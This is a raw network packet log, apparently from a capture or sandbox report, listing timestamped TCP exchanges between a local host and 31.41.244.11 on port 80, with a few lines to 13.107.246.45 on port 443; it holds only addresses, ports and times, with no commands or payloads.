                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.418416023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.418492079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.418540001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.419533014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.419611931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.419682980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.419734001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.420772076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.420886993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.420938015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.421634912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.421681881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.421746016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.421796083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.422750950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.422801018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.422971964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.423021078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.423890114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.423954010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.423985958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.424034119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.424900055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.425111055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.425182104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.426294088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.426346064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.426387072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.426436901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.427408934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.427465916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.427489996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.427532911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.428304911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.428353071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.428369045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.428422928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.429271936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.429337978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.429397106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.429444075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.430339098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.430417061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.430433989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.430485010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.431458950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.431513071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.431545973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.431597948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.432566881 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.432627916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.432709932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.432759047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.433629036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.433676958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.433717012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.433772087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.434712887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.434762955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.434839964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.434889078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.435798883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.435851097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.435909033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.435955048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.436872959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.436990023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.437041044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.438009024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.438059092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.438065052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.438112020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.439205885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.439255953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.439296007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.439348936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.440184116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.440243959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.440275908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.440320969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.441324949 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.441464901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.441515923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.442338943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.442385912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.442514896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.442564011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.443407059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.443459034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.443525076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.443586111 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.444505930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.444530964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.444557905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.444578886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.445585012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.445681095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.445745945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.446671963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.446723938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.446769953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.446820974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.447774887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.447828054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.447870970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.447921038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.448877096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.448993921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.449044943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.449940920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.449990988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.450042963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.450092077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.451086998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.451164961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.451164961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.451215029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.452277899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.452330112 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.452502012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.452549934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.453208923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.453346968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.453406096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.454335928 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.454385996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.454425097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.454474926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.455405951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.455455065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.455485106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.455532074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.456485033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.456533909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.456573963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.456623077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.457572937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.457693100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.457745075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.458664894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.458714008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.458719969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.458766937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.459755898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.459809065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.459836006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.459882975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.460844994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.460951090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.461004972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.461934090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.462007046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.462074995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.462120056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.463077068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.463121891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.463211060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.463254929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.464112997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.464176893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.464216948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.464266062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.465272903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.465337992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.465389967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.466291904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.466346979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.466408968 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.466459990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.467375994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.467427015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.467484951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.467530966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.468466043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.468514919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.468553066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.468601942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.469564915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.469707012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.469757080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.470623016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.470673084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.470731974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.470783949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.471736908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.471785069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.471856117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.471904039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626173973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626234055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626358032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626679897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626740932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626789093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.626840115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.627774954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.627832890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.627880096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.627929926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.628829002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.628884077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.628937006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.628984928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.629934072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.629983902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.630064011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.630111933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.631031036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.631083965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.631196976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.631246090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.632110119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.632159948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.632260084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.632308006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.633297920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.633378983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.633418083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.633467913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.634291887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.634345055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.634429932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.634480000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.635390997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.635442019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.635505915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.635554075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.636460066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.636511087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.636563063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.636610985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.637573957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.637624025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.637682915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.637729883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.638654947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.638704062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.638776064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.638823986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.639731884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.639782906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.639931917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.639978886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.640845060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.640897989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.640916109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.640961885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.641845942 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.641901970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.642040014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.642088890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.642482996 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.642501116 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643038034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643102884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643141985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643189907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:15.643300056 CET49776443192.168.2.413.107.246.45
